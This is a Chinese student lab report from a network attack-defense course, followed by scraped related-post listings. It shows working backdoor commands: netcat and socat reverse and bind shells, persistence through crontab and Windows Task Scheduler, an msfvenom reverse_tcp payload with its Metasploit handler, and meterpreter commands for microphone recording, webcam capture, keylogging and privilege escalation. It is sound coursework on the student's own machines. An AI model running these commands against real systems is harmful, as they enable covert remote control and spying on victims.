实验内容:

任务一:使用netcat获取主机操作Shell,cron启动
任务二:使用socat获取主机操作Shell, 任务计划启动
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
任务五:可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

基础问题问答:

(1)例举你能想到的一个后门进入到你系统中的可能方式?
捆绑在软件中
注入在可执行文件里
注入在office文件的宏里面
(2)例举你知道的后门如何启动起来(win及linux)的方式?
更改名字伪装成其他程序
Linux可以使用cron启动
Windows下通过任务计划来启动后门程序
(3)Meterpreter有哪些给你映像深刻的功能?
获取摄像头权限进行拍照
获取麦克风权限进行录音
(4)如何发现自己有系统有没有被安装后门?
杀毒软件进行扫描,没做过免杀的直接就能被扫出来
观察进程以及端口,看看有没有异常

在Windows下使用ipconfig查看本机IP

使用ncat.exe程序打开监听ncat.exe -l -p 5328

在kali中反弹连接Windows,netcat 192.168.1.200 5328 -e /bin/sh,使用-e选项执行shell程序

Windows成功获得kali的shell

Linux获得Windows Shell

由于我是直接从其他同学处拷贝的资源,所以图中含有其他同学做好的文件

在kali中使用ifconfig查看IP

打开监听nc -l -p 5328

在Windows中反弹连接kali

kali成功获得Windows的命令提示

使用nc传输数据

Windows下监听5328端口,ncat.exe -l 5328
kali反弹连接到Windows的5328端口,nc 192.168.1.200 5328
连接建立成功,双方可以相互传输数据

使用nc传输文件

Windows下监听5328端口,并把收到的数据保存到file1.out中,ncat.exe -l 5328 > file1.out

kali反弹连接到Windows的5328端口,nc 192.168.1.200 5328 < file1.in

连接建立成功,Win可以收到kali发来的文件。

实验步骤:

任务一:使用netcat获取主机操作Shell,cron启动

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
在Windows系统下,监听5328端口。
在Kali环境下,用crontab -e指令编辑一条定时任务。
在最后一行添加57 * * * * /bin/netcat 192.168.1.156 5328 -e /bin/sh,意思是在每个小时的第55分钟反向连接Windows主机的5328端口。

时间到达58分钟时反向连接Windows主机的5328端口
实验一完成。

任务二:使用socat获取主机操作Shell, 任务计划启动

socat:

  • socat是ncat的增强版,它使用的格式是socat [options]
    ,其中两个address是必选项,而options是可选项。
  • socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
  • 搜索打开“计算机管理”
    在“任务计划程序”中“创建任务”
    填写任务名->新建一个触发器

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5328 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5328,同时把cmd.exe的stderr重定向到stdout上:

创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行

此时,在Kali环境下输入指令socat - tcp:192.168.1.200:5328,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5328端口,此时可以发现已经成功获得了一个cmd shell

第二个任务完成。

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=5328 -f exe > 20165328_backdoor.exe,可见已经生成了后门程序“20165328_backdoor.exe”

在Windows下执行ncat.exe -l 5328 > 20165328_backdoor.exe,这样被控主机就进入了接收文件模式。

在Linux中执行nc 192.168.1.200 5328 < 20165328_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP
传送接收文件成功,如下图所示

在Kali上使用msfconsole指令进入msf控制台。

输入use exploit/multi/handler使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload
set LHOST 192.168.1.200,这里用的是LinuxIP,和生成后门程序时指定的IP相同
set LPORT 5328,同样要使用相同的端口

运行Windows下的后门程序

此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

第三个任务完成。

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

使用record_mic指令可以截获一段音频。

使用webcam_snap指令可以使用摄像头进行拍照

使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

使用screenshot指令可以进行截屏,效果如下:

先使用getuid指令查看当前用户,使用getsystem指令进行提权

第四个任务完成。

实验中遇到的问题及解决方法:

由于之前没有关闭防火墙和安全管家,导致之前的实验问题百出,关闭后就能够正常进行实验了。

2018-2019-2 网络对抗技术 20165328 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. [hosts]在hosts中屏蔽一级域名和二级域名的写法

    一级域名,如baidu: 0.0.0.0 baidu.com 二级域名 如有道公开课 0.0.0.0 ke.youdao.com 不带协议名,不带www. 用127.0.0.1也可以.

  2. Codeforces 1108E2 Array and Segments (Hard version)(差分+思维)

    题目链接:Array and Segments (Hard version) 题意:给定一个长度为n的序列,m个区间,从m个区间内选择一些区间内的数都减一,使得整个序列的最大值减最小值最大. 题解:利 ...

  3. HEOI2013SAO

    题目描述 给定一个\(DAG\),问这个\(DAG\)有多少种拓扑序. 题解 我们首先需要设计一个能够比较好的转移的状态. 我们可以设\(dp[i][j]\)表示第i个点在当前\(dp\)的子图中拓扑 ...

  4. zabbix3.2监控mysql主从(复制)状态

    问题背景: MySQL主从架构最常见不过了,在生产环境下,主从关系的状态的重要性不言而喻,这里小记一下通过zabbix监控主从状态,并用微信告警测试. 测试环境: 软件 MySQL-master My ...

  5. Java程序设计第一次作业

    虽说这学期Java比上学期的C语言要简单些许,但是初次面对java程序,还是有点难度的.

  6. Digao 连接Mysql 连接不上解决办法

    错误一:No module named 'MySQLdb' 原因:python3连接MySQL不能再使用mysqldb,取而代之的是pymysql. 解决方法:在python的MySQL包中,即路径: ...

  7. 【转】BTree,B-Tree,B+Tree,B*Tree

    B树: 即二叉搜索树: 1.所有非叶子结点至多拥有两个儿子(Left和Right): 2.所有结点存储一个关键字: 3.非叶子结点的左指针指向小于其关键字的子树,右指针指向大于其关键字的子树: 如: ...

  8. linux系统中日常运维常用命令汇总一

    一.查看日志和机器相关信息常用命令 1.cat cat 命令连接文件并打印到标准输出设备上,cat经常用来显示文件的内容,类似于下的type命令注意:当文件较大时,文本在屏幕上迅速闪过(滚屏),用户往 ...

  9. 2018-2019-2 网络对抗技术 20165232 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165232 Exp4 恶意代码分析 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2或Exp3中生成后门 ...

  10. Tomcat系列(7)——Tomcat类加载机制

    1. 核心部分 1. 类加载器: 通过一个类的全限定名来获取描述此类的二进制字节流. 对于任意一个类,都需要由加载他的类加载器和这个类本身一同确立其在Java虚拟机中的唯一性,每一个类加载器,都拥有一 ...